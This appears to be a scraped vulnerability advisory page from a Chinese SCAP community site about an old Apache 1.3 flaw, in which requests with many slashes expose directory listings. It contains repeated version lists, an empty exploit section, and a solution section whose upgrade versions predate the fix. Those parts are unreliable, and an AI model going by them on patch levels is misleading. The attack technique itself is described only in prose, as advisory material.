+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ SGI IRIX 6.5.18
+ SGI IRIX 6.5.17
+ SGI IRIX 6.5.16
+ SGI IRIX 6.5.15
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.14
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.13
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.12
+ Slackware Linux 8.0
+ Sun Cobalt Control Station 4100CS
+ Sun Cobalt RaQ 550
+ Sun Solaris 9_x86 Update 2
+ Sun Solaris 9_x86
+ Sun Solaris 9
+ Sun SunOS 5.9 _x86
+ Sun SunOS 5.9
Apache Software Foundation Apache 1.3.19
- Apple Mac OS X 10.0.3
- Caldera OpenLinux 2.4
+ Debian Linux 2.3
- Digital (Compaq) TRU64/DIGITAL UNIX 5.0
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 g
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 f
+ EnGarde Secure Linux 1.0.1
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- HP HP-UX 10.20
+ HP Secure OS software for Linux 1.0
- HP VirtualVault 4.5
+ Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
+ OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
+ OpenBSD OpenBSD 3.0
- Red Hat Linux 6.2
- RedHat Linux 7.1
- RedHat Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 i386
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- SGI IRIX 6.5.9
- SGI IRIX 6.5.8
- Sun Solaris 8_sparc
- Sun Solaris 7.0

- 不受影响的程序版本

Apache Software Foundation Apache 1.3.22
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ OpenPKG OpenPKG 1.0
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Apache Software Foundation Apache 1.3.20
- HP HP-UX 11.22
- HP HP-UX 11.20
+ MandrakeSoft Single Network Firewall 7.2
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ SGI IRIX 6.5.18
+ SGI IRIX 6.5.17
+ SGI IRIX 6.5.16
+ SGI IRIX 6.5.15
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.14
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.13
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.12
+ Slackware Linux 8.0
+ Sun Cobalt Control Station 4100CS
+ Sun Cobalt RaQ 550
+ Sun Solaris 9_x86 Update 2
+ Sun Solaris 9_x86
+ Sun Solaris 9
+ Sun SunOS 5.9 _x86
+ Sun SunOS 5.9
Apache Software Foundation Apache 1.3.19
- Apple Mac OS X 10.0.3
- Caldera OpenLinux 2.4
+ Debian Linux 2.3
- Digital (Compaq) TRU64/DIGITAL UNIX 5.0
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 g
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 f
+ EnGarde Secure Linux 1.0.1
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- HP HP-UX 10.20
+ HP Secure OS software for Linux 1.0
- HP VirtualVault 4.5
+ Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
+ OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
+ OpenBSD OpenBSD 3.0
- Red Hat Linux 6.2
- RedHat Linux 7.1
- RedHat Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 i386
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- SGI IRIX 6.5.9
- SGI IRIX 6.5.8
- Sun Solaris 8_sparc
- Sun Solaris 7.0

- 漏洞讨论

Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems.

A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents.

This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19.

- 漏洞利用

The following exploits were released:

- 解决方案

Upgrades available:


Apache Software Foundation Apache 1.3.12

Apache Software Foundation Apache 1.3.14

Apache Software Foundation Apache 1.3.17

Apache Software Foundation Apache 1.3.17

Apache Software Foundation Apache 1.3.9

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站